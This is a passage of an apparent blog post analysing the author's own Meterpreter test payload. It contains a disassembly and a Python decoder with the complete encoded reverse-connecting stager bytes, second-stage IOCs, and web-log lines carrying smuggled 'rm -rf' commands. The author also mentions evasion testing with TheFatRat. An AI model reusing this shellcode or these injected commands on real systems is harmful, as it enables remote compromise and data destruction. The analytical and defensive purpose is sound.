; changed to 32 bit. Only 0x00-0x17 are plain instructions: fldl2t / fnstenv [esp-0xc] / pop esi is the GetPC trick (esi = address of fldl2t), then xor dword [esi+0x18], edx / add esi, 4 / add edx, [esi+...] with cl = 0x47 and key 0x36346834 is the rolling-key XOR loop that msfvenom's x86/shikata_ga_nai encoder emits. The first XOR decodes the loop instruction itself, so everything from 0x18 on is encoded and the rest of this listing is noise until the bytes are decoded.
radare2 -b 32 resumehex.bin
[0x00000000]> pD
            0x00000000      d9e9           fldl2t
            0x00000002      ba34683436     mov edx, 0x36346834
      :     0x00000007      d97424f4       fnstenv dword [esp - 0xc]
      :     0x0000000b      5e             pop esi
      :     0x0000000c      33c9           xor ecx, ecx
      :     0x0000000e      b147           mov cl, 0x47                ; 'G'
      :     0x00000010      315618         xor dword [esi + 0x18], edx
      :     0x00000013      83c604         add esi, 4
      :     0x00000016      035620         add edx, dword [esi + 0x20]
      :     0x00000019      8ac1           mov al, cl
      :     0x0000001b      caa0c8         retf -0x3760
      :     0x0000001e      2a33           sub dh, byte [ebx]
      :     0x00000020      30ada3d601ed   xor byte [ebp - 0x12fe295d], ch
      :     0x00000026      d09331dd93f6   rcl byte [ebx - 0x96c22cf], 1
      :     0x0000002c      bd96f6e236     mov ebp, 0x36e2f696
      :     0x00000031      dade           fcmovu st(0), st(6)
      :     0x00000033      05ff51392b     add eax, 0x2b3951ff
      :     0x00000038      00c9           add cl, cl
     ,====< 0x0000003a      792a           jns 0x66
     |:     0x0000003c      82             invalid
     |:     0x0000003d      10ae8cbbdaa3   adc byte [esi - 0x5c254474], ch
     |:     0x00000043      cdfc           int 0xfc
     |:     0x00000045      07             pop es
     |:     0x00000046      49             dec ecx
     |:     0x00000047      9f             lahf
     |:     0x00000048      55             push ebp
     |:     0x00000049      43             inc ebx
     |:     0x0000004a      fc             cld
     |:     0x0000004b      30d2           xor dl, dl
     |:     0x0000004d      193dbaa88c45   sbb dword [0x458ca8ba], edi
     |:     0x00000053      5f             pop edi
     |`===< 0x00000054      78ae           js 4
     |      0x00000056      64ce           into
     | ,==< 0x00000058      f3e9a6f0d081   jmp 0x81d0f104
     | |    0x0000005e      ee             out dx, al
     | |,=< 0x0000005f      ea35afb9818d.  ljmp 0x5b8d:0x81b9af35
     `----> 0x00000066      3840dc         cmp byte [eax - 0x24], al   ; [0x2:1]=186
      |:|   0x00000069      a4             movsb byte es:[edi], byte ptr [esi]
      |:|   0x0000006a      97             xchg eax, edi
      |:|   0x0000006b      ad             lodsd eax, dword [esi]
      |:|   0x0000006c      d156e9         rcl dword [esi - 0x17], 1
       ,==< 0x0000006f      ead5889c0226.  ljmp 0x3426:0x29c88d5
     ||:|   0x00000076      a7             cmpsd dword [esi], dword ptr es:[edi] ; [0x170000001c:4]=-1 ; 98784247836
     ||:|   0x00000077      d055e2         rcl byte [ebp - 0x1e], 1
     ||:|   0x0000007a      22c3           and al, bl
     ||:|   0x0000007c      fd             std
     ||:|   0x0000007d      61             popal
     ||:|   0x0000007e      94             xchg eax, esp
     ||:|   0x0000007f      2f             das
     ||:|   0x00000080      fc             cld
     ||:|   0x00000081      a6             cmpsb byte [esi], byte ptr es:[edi] ; [0x170000001c:1]=255 ; 98784247836
     ||:|   0x00000082      43             inc ebx
     ||:|   0x00000083      bbf20307e3     mov ebx, 0xe30703f2
     ||:|   0x00000088      16             push ss
     ||:|   0x00000089      95             xchg eax, ebp
     ||:|   0x0000008a      c49f221eeb4f   les ebx, [edi + 0x4feb1e22]
     ||:|   0x00000090      a364c84be8     mov dword [0xe84bc864], eax ; [0xe84bc864:4]=-1
     ||:|   0x00000095      3f             aas
      ||`=< 0x00000096      71cd           jno 0x65
      |||   0x00000098      54             push esp
      |||   0x00000099      91             xchg eax, ecx
      |||   0x0000009a      8e0d374e2b45   mov cs, word [0x452b4e37]   ; [0x452b4e37:2]=0xffff
      |||   0x000000a0      d59b           aad 0x9b
      |||   0x000000a2      46             inc esi
      |||   0x000000a3      04b1           add al, 0xb1
      |||   0x000000a5      686bb741e7     push 0xe741b76b
      |||   0x000000aa      fc             cld
      |||   0x000000ab      c473a8         les esi, [ebx - 0x58]
      |||   0x000000ae      56             push esi
      |||   0x000000af      43             inc ebx
      ||.-> 0x000000b0      3f             aas
     ||:|   0x000000b1      217194         and dword [ecx - 0x6c], esi
     ||:|   0x000000b4      40             inc eax
     ||:|   0x000000b5      18c5           sbb ch, al
     ||:|   0x000000b7      0abfa336027b   or bh, byte [edi + 0x7b0236a3]
     ||:|   0x000000bd      f7663c         mul dword [esi + 0x3c]
     ||:|   0x000000c0      aa             stosb byte es:[edi], al
      ||`=< 0x000000c1      78ed           js 0xb0
      |||   0x000000c3      bc53ad98b6     mov esp, 0xb698ad53
      |||   0x000000c8      c3             ret
      |||   0x000000c9      96             xchg eax, esi
      |||   0x000000ca      6a77           push 0x77                   ; 'w' ; 119
      ||,=< 0x000000cc      714f           jno 0x11d
     ||||   0x000000ce      97             xchg eax, edi
      ,===< 0x000000cf      7756           ja 0x127
    |||||   0x000000d1      bf1e91c8ef     mov edi, 0xefc8911e
     ,====< 0x000000d6      700e           jo 0xe6
   ||||||   0x000000d8      a85f           test al, 0x5f               ; '_'
   ||||||   0x000000da      31fe           xor esi, edi
   ||||||   0x000000dc      40             inc eax
   ||||||   0x000000dd      8abe2170b514   mov bh, byte [esi + 0x14b57021] ; [0x14b57021:1]=255
   ||||||   0x000000e3      4a             dec edx
   ||||||   0x000000e4      1a5ac1         sbb bl, byte [edx - 0x3f]
    |||||   0x000000e7      22b2c348b823   and dh, byte [edx + 0x23b848c3]
    |||||   0x000000ed      0b47c4         or eax, dword [edi - 0x3c]
    |||||   0x000000f0      638764382d60   arpl word [edi + 0x602d3864], ax
    |||||   0x000000f6      002a           add byte [edx], ch
    |||||   0x000000f8      d9805f104f9e   fld dword [eax - 0x61b0efa1]
     ,====< 0x000000fe      753f           jne 0x13f
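Rather than reading encoded bytes, replay the decoder. This is an added example, not from the post: key, counter and XOR offset are taken from the 32-bit listing (mov edx, 0x36346834; mov cl, 0x47; xor dword [esi+0x18], edx) and the byte array is the one from the PowerShell script above, copied in full. The displacement byte of "add edx, dword [esi+0x20]" sits at 0x18, inside the first XOR window, so at run time it is 0x20 ^ 0x34 = 0x14: after add esi, 4 the key is bumped by the dword that was just decoded, and 0x8a 0xc1 at 0x19 becomes e2 f5, the loop back to the xor. 0x18 + 0x47*4 = 0x134 = 308, exactly the array length.

```python
"""Replay the shikata_ga_nai-style decoder loop over the recovered shellcode.

Added example, not code from the post. Key, count and XOR offset come from the
radare2 listing; ENCODED_HEX is the [Byte[]]$z array from the PowerShell script.
"""
import struct

# The 308 bytes of [Byte[]]$z: 0x18-byte stub followed by 0x47 encoded dwords.
ENCODED_HEX = (
    "d9e9ba34683436d97424f45e33c9b147"  # fldl2t; mov edx,key; fnstenv; pop esi; xor ecx,ecx; mov cl,0x47
    "31561883c6040356208ac1caa0c82a33"  # xor [esi+0x18],edx; add esi,4; add edx,[esi+0x20->0x14]; encoded from 0x19
    "30ada3d601edd09331dd93f6bd96f6e2"
    "36dade05ff51392b00c9792a8210ae8c"
    "bbdaa3cdfc07499f5543fc30d2193dba"
    "a88c455f78ae64cef3e9a6f0d081eeea"
    "35afb9818d5b3840dca497add156e9ea"
    "d5889c022634a7d055e222c3fd61942f"
    "fca643bbf20307e31695c49f221eeb4f"
    "a364c84be83f71cd54918e0d374e2b45"
    "d59b4604b1686bb741e7fcc473a85643"
    "3f2171944018c50abfa336027bf7663c"
    "aa78edbc53ad98b6c3966a77714f9777"
    "56bf1e91c8ef700ea85f31fe408abe21"
    "70b5144a1a5ac122b2c348b8230b47c4"
    "638764382d60002ad9805f104f9e753f"
    "6f0a729638a278cf0e6d823a05a41685"
    "71c9f605819f9c05e947c5550c88d0c9"
    "9d1ddbbb72b5b341adf11bb99803676c"
    "e47189ac"
)

KEY = 0x36346834   # mov edx, 0x36346834
COUNT = 0x47       # mov cl, 0x47 -> 71 dwords = 284 bytes
XOR_DISP = 0x18    # xor dword [esi + 0x18], edx ; esi = address of fldl2t via fnstenv


def shikata_decode(encoded: bytes, key: int = KEY, count: int = COUNT,
                   xor_disp: int = XOR_DISP) -> bytes:
    """Emulate: xor [esi+disp], edx ; add esi, 4 ; add edx, [esi+disp-4] ; loop.

    The key-update displacement is stored pre-encoded in the stub; after the first
    XOR it reads disp-4, so each round adds the dword just decoded to the key.
    """
    buf = bytearray(encoded)
    need = xor_disp + 4 * count
    if len(buf) < need:
        raise ValueError(f"buffer is {len(buf)} bytes, decoder touches {need}")
    esi, edx = 0, key
    for _ in range(count):
        off = esi + xor_disp
        plain = struct.unpack_from("<I", buf, off)[0] ^ edx
        struct.pack_into("<I", buf, off, plain)
        esi += 4
        edx = (edx + struct.unpack_from("<I", buf, esi + xor_disp - 4)[0]) & 0xFFFFFFFF
    return bytes(buf)


def decode_post_payload() -> bytes:
    """Decode the sample from the post and check the self-modifying stub decoded sanely."""
    decoded = shikata_decode(bytes.fromhex(ENCODED_HEX))
    # First XOR must turn byte 0x18 into the real displacement (0x14) and
    # bytes 0x19-0x1a into 'loop' back to the xor (e2 f5).
    if decoded[XOR_DISP] != XOR_DISP - 4 or decoded[XOR_DISP + 1:XOR_DISP + 3] != b"\xe2\xf5":
        raise ValueError("stub did not decode to add/loop: wrong key or offset")
    return decoded


def stager_offset(decoded: bytes) -> int:
    """Offset of the Metasploit block_api prologue (cld; call; pushad; mov ebp,esp), or -1."""
    return decoded.find(b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5")


if __name__ == "__main__":
    plain = decode_post_payload()
    start = stager_offset(plain)
    print(f"stager prologue at 0x{start:x}")
    print(plain[start:start + 32].hex(" "))
    with open("resumehex.decoded.bin", "wb") as fh:
        fh.write(plain[start:])  # then: radare2 -b 32 resumehex.decoded.bin
```

The decoded bytes right after the stub are fc e8 82 00 00 00 60 89 e5 31 c0 64 8b 50 30 8b 52 0c 8b 52 14 (cld; call; pushad; mov ebp, esp; xor eax, eax; mov edx, fs:[eax+0x30]; walk the PEB loader list), the block_api prologue every Metasploit Windows stager starts with, which matches the Meterpreter traffic captured further down. Disassembling the written-out file with -b 32 gives a listing that actually makes sense.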

; because lazy and time
https://app.any.run/tasks/995eb5e3-4c5f-4c47-b849-67ff647c6387

; Connection data
(myserver):9008 -> exe came across
dumped the entire pcap from the C2 into a file:
- file resumepcap.hexdump
--  resumepcap.hexdump: data
egrep -nor '[^ ]{30,}' resumepcap.stringsdump |grep string
1237:string=core_negotiate_tlv_encryption
1238:string=core_transport_set_timeouts
1239:string=core_transport_getcerthash
1240:string=core_transport_setcerthash
1261:string=\a\a\b\b\t\t\n\n\v\v\f\f\r\r
1382:string=InitializeCriticalSectionEx
1385:string=SetThreadStackGuarantee
1388:string=WaitForThreadpoolTimerCallbacks
1393:string=FlushProcessWriteBuffers
1394:string=FreeLibraryWhenCallbackReturns
1395:string=GetCurrentProcessorNumber
1396:string=GetLogicalProcessorInformation
1398:string=SetDefaultDllDirectories
1404:string=GetUserDefaultLocaleName
1409:string=GetFileInformationByHandleExW
1410:string=SetFileInformationByHandleW
1436:string=GetUserObjectInformationW
1437:string=GetProcessWindowStation
1770:string=QQ𥸸𥽼𦃀ᙏὫ峹巋O3ï澢漣瀻瀎潌滺殭歩樭栺损槎摲撋搹敷掊搔措揉敆檇憺抪戡拔曇晬暧晜暄栎枵枍曧杘朏晋昪欗棭榨梽硒砩礓禔穑𦅭𦅲𦠑𦆆𦆗𦆦𦆴𦇃𦇛𦇯𦈅𦈠𦈰𦈿𦉒𦉲𦊄𦊖𦊥𦋃𦋔𦋥𦋵𦌌𦌙𦌦𦍁𦍡𦍳𦎋𦎩𦎺𦏈𦏢𦏺𦐍𦐤𦐳𦑈𦑙𦑮𦒂𦒛𦒹𦓎𦓟𦓵𦔉𦔞𦔳𦕆𦕜𦕰𦖇𦖢𦖲𦗒𦗠𦗴𦘋𦘚𦘪𦘹𦙔𦙨𦙾𦚘𦚳𦛌𦛨𦜂𦜟𦜯𦝍𦝮𦝾𦞝𦞶𦟈𦟝𦟷𠁐
1773:string=packet_get_tlv_value_string
1774:string=packet_get_tlv_value_uint
1775:string=packet_get_tlv_value_wstring
1777:string=packet_is_tlv_null_terminated
1778:string=packet_remove_completion_handler
1780:string=packet_transmit_empty_response
1781:string=packet_transmit_response
1784:string=scheduler_insert_waitable
1785:string=scheduler_signal_waitable
1786:string=_scheduler_waitable_thread@4
1789:string=CertGetCertificateContextProperty
1813:string=WinHttpGetIEProxyConfigForCurrentUser
1826:string=SetUnhandledExceptionFilter
1856:string=GetProcessWindowStation
1857:string=GetUserObjectInformationW
1862:string=AllocateAndInitializeSid
1864:string=InitializeSecurityDescriptor
1865:string=SetSecurityDescriptorDacl
1866:string=SetSecurityDescriptorSacl
1873:string=CryptImportPublicKeyInfo
1895:string=CreateToolhelp32Snapshot
1903:string=GetSystemTimeAsFileTime
1908:string=IsProcessorFeaturePresent
1922:string=QueryPerformanceCounter
1924:string=FreeEnvironmentStringsW
1925:string=UnhandledExceptionFilter
1926:string=InitializeCriticalSectionAndSpinCount
1946:string=ImpersonateLoggedOnUser
2008:string=core_pivot_session_died
2028:string=\a\a\b\b\t\t\n\n\v\v\f\f\r\r
2056:string=\t\a\f\b\f\t\f\n\a\v\b\f
2061:string=abcdefghijklmnopqrstuvwxyz
2062:string=ABCDEFGHIJKLMNOPQRSTUVWXYZ
2064:string=abcdefghijklmnopqrstuvwxyz
2065:string=ABCDEFGHIJKLMNOPQRSTUVWXYZ
2147:string=6#6'6+6/63676;6/8N8m8r8
2183:string=3\a43494=4B4H4L4R4V4\4`4e4k4o4u4y4
2186:string=:\b:$:0:6:A:O:X:b:r:w:|:
2212:string=2$2*22272=2E2J2P2X2]2c2k2p2v2~2
2248:string=6<:@:D:H:L:P:T:X:\:`:d:h:
2255:string=:$:,:4:<:D:L:T:\:d:l:t:|:
2256:string=;$;,;4;<;D;L;T;\;d;l;t;|;
2257:string=<$<,<4<<<D<L<T<\<d<l<t<|<
2258:string==$=,=4=<=D=L=T=\=d=l=t=|=
2259:string=>$>,>4><>D>L>T>\>d>l>t>|>
2260:string=?$?,?4?<?D?L?T?\?d?l?t?|?
2261:string=0$0,040<0D0L0T0\0d0l0t0|0

; Got new binary / 2nd stage (the core_*, packet_*_tlv_* and scheduler_* strings above are Meterpreter metsrv exports, so this is the staged Meterpreter DLL)
binwalk -e resumepcap.hexdump
file _resumepcap.hexdump.extracted/4
_resumepcap.hexdump.extracted/4: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
md5sum _resumepcap.hexdump.extracted/4
eeb70c0bd145011062f0116738e10a5e  _resumepcap.hexdump.extracted/4
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d md5: eeb70c0bd145011062f0116738e10a5e
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d sha1: 295be71de968e22a14c2a0fb558d3295b4c2a7c3
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d sha256: 5baecac3ee5cf8f8f0d13d19c540310681abbc1e6978e397d077885d6c104b6f
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d sha384: 950bee417b6b6fa9bbdb4becbcba3b574a4d8d4201d6a089bd8bf4a566291d976f803331999cd46ed2c53c49bdeda973
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d sha512: aa15fb09b5e8a5b9904ef3582f28a521afc32a1f3771dec65e5699b08bcad2fbccfb43c1124987cc1d78ba8814a98c75f28ff73a82f7c125c5515f389c7d9cff
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d crc16: 4df2
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d crc32: c854733c
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d md4: db31d79e9eaddfc0a93e043d058c9ca0
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d xor: ae
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d xorpair: 54fa
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d parity: 01
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d entropy: 07000000
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d hamdist: 06
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d pcprint: 22
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d mod255: f6
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d xxhash: ae3757fa
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d adler32: 52af2f02
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d luhn: 03
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d crc8smbus: ef
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d crc15can: 759f
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d crc16hdlc: 270e
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d crc16usb: 2328
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d crc16citt: 8672
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d crc24: bd3f25
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d crc32c: 2fa98f85
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d crc32ecma267: c7e20603
; lazy again:
cp _resumepcap.hexdump.extracted/4 ./4.exe
https://www.virustotal.com/#/file/5baecac3ee5cf8f8f0d13d19c540310681abbc1e6978e397d077885d6c104b6f/detection
https://www.hybrid-analysis.com/sample/5baecac3ee5cf8f8f0d13d19c540310681abbc1e6978e397d077885d6c104b6f?environmentId=120

; Total IOCs
(myserver):9008
9A8FE886ABA12E02FD0FC44F004A7111

rahash2 -a all _resumepcap.hexdump.extracted/4 |awk '{print $3,$4}'
md5: eeb70c0bd145011062f0116738e10a5e
sha1: 295be71de968e22a14c2a0fb558d3295b4c2a7c3
sha256: 5baecac3ee5cf8f8f0d13d19c540310681abbc1e6978e397d077885d6c104b6f
sha384: 950bee417b6b6fa9bbdb4becbcba3b574a4d8d4201d6a089bd8bf4a566291d976f803331999cd46ed2c53c49bdeda973
sha512: aa15fb09b5e8a5b9904ef3582f28a521afc32a1f3771dec65e5699b08bcad2fbccfb43c1124987cc1d78ba8814a98c75f28ff73a82f7c125c5515f389c7d9cff
crc16: 4df2
crc32: c854733c
md4: db31d79e9eaddfc0a93e043d058c9ca0
xor: ae
xorpair: 54fa
parity: 01
entropy: 07000000
hamdist: 06
pcprint: 22
mod255: f6
xxhash: ae3757fa
adler32: 52af2f02
luhn: 03
crc8smbus: ef
crc15can: 759f
crc16hdlc: 270e
crc16usb: 2328
crc16citt: 8672
crc24: bd3f25
crc32c: 2fa98f85
crc32ecma267: c7e20603

rahash2 -a all resume1.doc.exe |awk '{print $3,$4}'
md5: 90f7ee1bf4451349dfa7c518a8c6202a
sha1: 0c214854fef6ac5c28f84bf07ee6d39eb3595d82
sha256: ea2bb0a47fedb86127a59e71285f61036e1ff9c4e0a1d0fae6fe8f2931e4d5a6
sha384: abfd2915e8b1bce3c871a8faec67b503599908c24ba08dfdcc8ca52c04560ec132328a31f53d4c8853ce12256488d0ad
sha512: fac47672393b774135997b98c86874667a526bc40c8ab04745d4c28de3b1afdea9f8efc257a9e8e4f42d3341f065a81bde0fe93a220a3adae338a1776bb5a691
crc16: 9f78
crc32: 1b63e4bd
md4: 282dcd274bd2efade3765ddff3ec65e1
xor: eb
xorpair: 3ad1
parity: 00
entropy: 03000000
hamdist: 01
pcprint: 2d
mod255: 4d
xxhash: 5924b386
adler32: 913ba49c
luhn: 00
crc8smbus: 3f
crc15can: 5a1d
crc16hdlc: 4045
crc16usb: a732
crc16citt: 4b6a
crc24: 7a1917
crc32c: d18b15a4
crc32ecma267: df97a7b0

rahash2 -a all resumebase64.decoded |awk '{print $3,$4}'
md5: 3205f33d70ec93109d60da5fe1002e7e
sha1: ec19a5fa86353b176941809b1e9858aead9047a3
sha256: e02b170466ee0f810656bfeca8c9c7ce523b635fa36248dd7f9259629a593be5
sha384: f232b1f8dd2d2c4d07dc761eb6ef1b7defbc6379f15222d607e43e22a2f0c48ea98986db9e32164e3c88287d34224d73
sha512: 547fb256993e4febce7f3da35ce5cfbf485e8ee97f9fe1861b82172b4c7f94082fa5b66738d289a0db2fb3be97acb900290786bf987f813ef00eb8aee97f1f51
crc16: 78af
crc32: d40234f5
md4: 1a8108290cfc7ffa605b0879d6e3b8f2
xor: 0a
xorpair: 0a00
parity: 00
entropy: 03000000
hamdist: 02
pcprint: 32
mod255: 98
xxhash: c09b7c9b
adler32: be051623
luhn: 09
crc8smbus: 84
crc15can: 4d93
crc16hdlc: e7fa
crc16usb: 8313
crc16citt: f7ba
crc24: e9c836
crc32c: 75c98a63
crc32ecma267: 04a00a8f

The gist of all that is that it connected back to port 9008 on my server, where I have an active meterpreter listener forwarded to. Pretty easy, not really a difficult analysis, really a 5 minute rush job. But it does help me confirm that meterpreter launches that secondary payload when run, which is pretty sweet, though everyone sort of knew that. Since launching this and a few other things online, I've received a number of hits on my shell from people looking at that port:

185.220.101.6
163.172.214.8
37.59.20.111
107.178.194.23
52.200.221.20
14.141.107.206
66.249.88.132
208.87.233.140
185.220.101.13
161.69.99.11
5.62.59.93
1.192.194.17
134.96.238.193
50.112.194.65
As of the time of this writing:
curl "https://torstatus.blutmagie.de/ip_list_exit.php/Tor_ip_list_EXIT.csv" 2>/dev/null|grep "185.220.101.6\|163.172.214.8\|37.59.20.111\|107.178.194.23\|52.200.221.20\|50.112.194.65\|14.141.107.206\|66.249.88.132\|208.87.233.140\|185.220.101.13\|161.69.99.11\|5.62.59.93\|1.192.194.17\|134.96.238.193\|50.112.194.65"
163.172.214.8
185.220.101.6
185.220.101.13

This last one is sort of amusing because it tells me they looked a little bit into my site:

/var/log/apache2/access.log:50.112.194.65 - - [16/Apr/2018:07:31:29 -0500] "GET /diagfix.cmd HTTP/1.1" 200 7184 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
/var/log/apache2/access.log.8:50.112.194.65 - - [05/Mar/2018:10:29:43 -0600] "GET /miner.html?lol&rm -rf" 400 0 "-" "-"
/var/log/apache2/access.log.8:50.112.194.65 - - [05/Mar/2018:10:35:32 -0600] "GET / HTTP/1.1" 200 198376 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"

Edit: I wanted to add more, because the comparison amuses me between the IPs connecting to the C2 port for my test malware and the hosts connecting to my web server, not including Tor nodes:

grep -i "37.59.20.111\|107.178.194.23\|52.200.221.20\|14.141.107.206\|66.249.88.132\|208.87.233.140\|161.69.99.11\|5.62.59.93\|1.192.194.171\|34.96.238.193\|50.112.194.65" /var/log/apache2/access.log*
/var/log/apache2/access.log:50.112.194.65 - - [16/Apr/2018:07:31:29 -0500] "GET /diagfix.cmd HTTP/1.1" 200 7184 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
/var/log/apache2/access.log.8:107.178.194.23 - - [05/Mar/2018:10:26:56 -0600] "GET /miner.html?lol&rm%20-rf%20/boot/&rm%20-rf%20/opt/&rm%20-rf%20~/& HTTP/1.1" 200 654 "http://0daz.io" "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) AppEngine-Google; (+http://code.google.com/appengine; appid: s~virustotalcloud)"
/var/log/apache2/access.log.8:208.87.233.140 - - [05/Mar/2018:10:26:56 -0600] "GET /miner.html HTTP/1.1" 200 654 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13"
/var/log/apache2/access.log.8:208.87.233.140 - - [05/Mar/2018:10:26:57 -0600] "GET /coinhive.min.js HTTP/1.1" 200 18805 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13"
/var/log/apache2/access.log.8:50.112.194.65 - - [05/Mar/2018:10:29:43 -0600] "GET /miner.html?lol&rm -rf" 400 0 "-" "-"
/var/log/apache2/access.log.8:208.87.233.140 - - [05/Mar/2018:10:32:39 -0600] "GET / HTTP/1.1" 200 8440260 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_6) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1"
/var/log/apache2/access.log.8:52.200.221.20 - - [05/Mar/2018:10:35:21 -0600] "GET / HTTP/1.1" 200 157832 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
/var/log/apache2/access.log.8:50.112.194.65 - - [05/Mar/2018:10:35:32 -0600] "GET / HTTP/1.1" 200 198376 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"


These are both things that have been scanned with VirusTotal or other platforms for shits and giggles, but it draws a clear picture that some analysts do, and some don't, use Tor with their analysis.
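The Tor-exit and web-log cross-check done above with curl and grep, written out as a repeatable script. This is an added example, not part of the original post: the visitor list, the Tor exit CSV and the access-log lines are constructed samples modelled on the lines quoted above so the script runs offline; in practice you would feed it the CSV from curl and the real access.log. It matches on the parsed client field exactly, which also sidesteps a pitfall of the post's grep: with unescaped dots and substring matching, a pattern like 50.112.194.65 also matches a line from 150.112.194.65.

```python
"""Cross-check listener visitors against a Tor exit list and Apache access logs.

Added example (not from the original post). The visitor list, Tor exit CSV
and access-log lines are constructed samples in the style of the post so the
script runs offline; swap in the real CSV and access.log in practice.
"""
import re
from ipaddress import ip_address

# Constructed: addresses that connected to the test C2 listener (port 9008)
C2_HITS = """
185.220.101.6
163.172.214.8
37.59.20.111
107.178.194.23
52.200.221.20
50.112.194.65
208.87.233.140
185.220.101.13
""".split()

# Constructed stand-in for the Tor exit list CSV the post fetches with curl
TOR_EXIT_CSV = """185.220.101.6
163.172.214.8
185.220.101.13
198.51.100.7
"""

# Constructed Apache combined-log lines modelled on the post's grep output;
# 203.0.113.9 never hit the listener and 150.112.194.65 is there to show the
# substring pitfall of an unescaped grep pattern.
ACCESS_LOG = r'''50.112.194.65 - - [16/Apr/2018:07:31:29 -0500] "GET /diagfix.cmd HTTP/1.1" 200 7184 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
107.178.194.23 - - [05/Mar/2018:10:26:56 -0600] "GET /miner.html?lol HTTP/1.1" 200 654 "http://0daz.io" "Mozilla/5.0 AppEngine-Google; (+http://code.google.com/appengine; appid: s~virustotalcloud)"
208.87.233.140 - - [05/Mar/2018:10:26:57 -0600] "GET /coinhive.min.js HTTP/1.1" 200 18805 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US)"
150.112.194.65 - - [05/Mar/2018:10:30:00 -0600] "GET / HTTP/1.1" 200 198376 "-" "Mozilla/4.0 (compatible; MSIE 8.0)"
203.0.113.9 - - [05/Mar/2018:10:40:00 -0600] "GET / HTTP/1.1" 200 8440 "-" "curl/7.58.0"
'''

# Apache "combined" LogFormat: client ident user [time] "request" status size "referer" "user-agent"
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)


def parse_tor_exits(csv_text):
    """Collect the valid IP addresses in a Tor exit list (headers/junk skipped)."""
    exits = set()
    for line in csv_text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            exits.add(str(ip_address(line)))
        except ValueError:
            continue
    return exits


def parse_access_log(text):
    """Parse Apache combined-format lines into dicts; unparsable lines are dropped."""
    return [m.groupdict() for m in map(COMBINED.match, text.splitlines()) if m]


def split_tor(c2_hits, tor_exits):
    """Partition listener visitors into Tor exits and direct (non-Tor) addresses."""
    tor = sorted(ip for ip in c2_hits if ip in tor_exits)
    direct = sorted(ip for ip in c2_hits if ip not in tor_exits)
    return tor, direct


def correlate(c2_hits, tor_exits, log_text):
    """Map each direct (non-Tor) listener visitor to the web-server requests it made."""
    _, direct = split_tor(c2_hits, tor_exits)
    wanted = set(direct)
    hits = {}
    for rec in parse_access_log(log_text):
        if rec["ip"] in wanted:  # exact match on the parsed client field
            hits.setdefault(rec["ip"], []).append(rec)
    return hits


def grep_style_hit(ip, line):
    """Mimic the post's grep: the pattern is an unescaped regex, so '.' is a
    wildcard and any substring of the line matches. Kept only to show the pitfall."""
    return re.search(ip, line) is not None


if __name__ == "__main__":
    exits = parse_tor_exits(TOR_EXIT_CSV)
    tor, direct = split_tor(C2_HITS, exits)
    print("via Tor exits:", tor)
    print("direct:", direct)
    for ip, recs in correlate(C2_HITS, exits, ACCESS_LOG).items():
        for r in recs:
            print(f"{ip} {r['ts']} {r['req']} -> {r['status']} ua={r['ua']!r}")
```

Run it as-is to see the partition and the correlated requests; the `grep_style_hit` helper is only there to demonstrate why the parsed-field comparison is used instead of a raw regex search over the log line.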

But what are people trying to analyze? Well, the miner one, with that particular notion at the end, was one provided in another post on this blog plus my own GET data added to it. This was a specific URL attempt put into VirusTotal because I want to track who's tracking this. The diagfix one is unrelated, but is a repeatedly regenerated (every 300 seconds) unicorn powershell payload. I did this for ease of use and for testing the "fud" capabilities of TheFatRat. Honestly, it does a decent job of evading some shit, but anyone who looks at it for a split second would recognize it. YARA rules could easily detect it, or the exec form. You'll see in my above example I left out the meterpreter YARA rules; this is because, well, I wanted the analysis without the answer being provided to me.
